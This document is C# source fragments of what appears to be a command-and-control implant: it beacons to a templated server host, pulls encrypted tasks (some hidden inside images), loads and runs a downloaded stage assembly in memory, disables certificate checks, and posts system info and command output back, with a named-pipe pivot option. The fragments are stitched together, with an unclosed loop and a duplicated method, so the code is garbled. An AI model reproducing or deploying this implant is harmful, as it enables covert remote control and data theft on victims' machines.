public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered)
{
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string resp = wc.DownloadString(rpaddress);
if (!string.IsNullOrEmpty(resp))
{
if (isCovered)
{
string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/'));
resp = Encoding.Default.GetString(ImageLoader.ImageLoader.Load(baseurl, rpaddress, resp, wc, targetclass));
}
var line = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);
TaskMsg task = null;
try
{
task = new JavaScriptSerializer().Deserialize <TaskMsg>(line);
//task = JsonConvert.DeserializeObject<TaskMsg>(line);
}
catch (Exception)
{
}
return(task);
}
else
{
return(null);
}
}
//AES
public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
{
ResponseMsg respmsg = new ResponseMsg
{
TaskInstanceid = taskinstance,
SystemInfo = GetSystemInfo(),
Chunked = false,
Agentid = agentid,
Number = 1,
Data = output
};
if (agentpivot != null)
{
respmsg.AgentPivot = agentpivot;
}
string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
//string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);
string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string resp = wc.UploadString(rpaddress, post);
}
public static byte[] Load(string baseurl, string rpaddress, string page, CookiedWebClient wc, string targetclass)
{
List <string> imagetags = GetImagesInHTMLString(page, targetclass);
string s = imagetags.First();
wc.Headers.Add(HttpRequestHeader.Referer, rpaddress);
Stream imgstream = wc.OpenRead(baseurl + GetIdValue(s, "src"));
return(GetPayloadFromImage(imgstream, Int32.Parse(GetIdValue(s, "id"))));
}
public static void Execute()
{
string[] pageget =
{
#PAGEGET #
};
string[] pagepost =
{
#PAGEPOST #
};
string param = "#PARAM#";
string serverkey = "#SERVERKEY#";
string host = "#HOST#";
string namedpipe = "#PIPENAME#";
int port = 0;
int targetframework = 40;
Int32.TryParse("#PORT#", out port);
Int32.TryParse("#FRAMEWORK#", out targetframework);
Thread.Sleep(10000);
AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();
agentIdReqMsg.address = host;
agentIdReqMsg.port = port;
agentIdReqMsg.request = "agentid";
agentIdReqMsg.framework = targetframework;
string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
bool agentexit = false;
while (true && !agentexit)
{
try
{
string resp = "";
string cookievalue = "";
NamedPipeClientStream pipe = null;
if (string.IsNullOrEmpty(namedpipe))
{
CookiedWebClient wc = new CookiedWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
WebHeaderCollection webHeaderCollection = new WebHeaderCollection();
webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");
#HEADERS #
wc.Headers = webHeaderCollection;
ServicePointManager.Expect100Continue = true;
ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
ServicePointManager.DefaultConnectionLimit = 9999;
ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });
string post = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);
resp = wc.UploadString(rpaddress, post);
Cookie cookie = wc.ResponseCookies["sessionid"];
cookievalue = cookie.Value;
}
else
{
try
{
pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
pipe.Connect(5000);
pipe.ReadMode = PipeTransmissionMode.Message;
//Write AgentIdReqMsg
var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);
var messageBytes = ReadMessage(pipe);
resp = Encoding.UTF8.GetString(messageBytes);
}
catch (Exception)
{
}
}
var line = DecryptMessage(serverkey, resp);
AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);
object[] agrsstage = new object[] {
line, cookievalue, pipe
};
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
}
//AES
public static void SendCheckinHttp(string agentid, byte[] aeskey, byte[] aesiv, string rpaddress, string param, CookiedWebClient wc)
{
//Collect system info
SystemInfo sinfo = GetSystemInfo();
CheckInMsg msg = new CheckInMsg();
msg.agentid = agentid;
msg.systeminfo = sinfo;
string checkinmsg = new JavaScriptSerializer().Serialize(msg);
//string checkinmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
var checkinmsgenc = Crypto.Aes.EncryptAesMessage(checkinmsg, aeskey, aesiv);
string post = String.Format("{0}={1}", param, Convert.ToBase64String(checkinmsgenc));
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string resp = wc.UploadString(rpaddress, post);
string respjson = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);
}
//AES
public static void SendOutputHttp(string taskinstance, string output, CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string param, string agentid, string agentpivot = null)
{
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
ResponseMsg respmsg = new ResponseMsg
{
TaskInstanceid = taskinstance,
SystemInfo = GetSystemInfo(),
Chunked = false,
Agentid = agentid,
Number = 1
};
int chunksize = 1024000;
//Response need to be splitted
if (output.Length > chunksize)
{
respmsg.Chunked = true;
}
//Chunk number
int chunknum = output.Length / chunksize;
if (output.Length % chunksize != 0)
{
chunknum++;
}
respmsg.Number = chunknum;
int iter = 0;
do
{
int remaining = output.Length - (iter * chunksize);
if (remaining > chunksize)
{
remaining = chunksize;
}
respmsg.Data = output.Substring(iter * chunksize, remaining);
string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
//string respmsgjson = JsonConvert.SerializeObject(respmsg, Formatting.Indented);
var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);
string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));
string resp = wc.UploadString(rpaddress, post);
iter++;
}while (chunknum > iter);
if (respmsg.Chunked)
{
respmsg.Data = "";
respmsg.Number = 0;
string respmsgjson = new JavaScriptSerializer().Serialize(respmsg);
var response = Crypto.Aes.EncryptAesMessage(respmsgjson, aeskey, aesiv);
string post = String.Format("{0}={1}", param, Convert.ToBase64String(response));
string resp = wc.UploadString(rpaddress, post);
}
}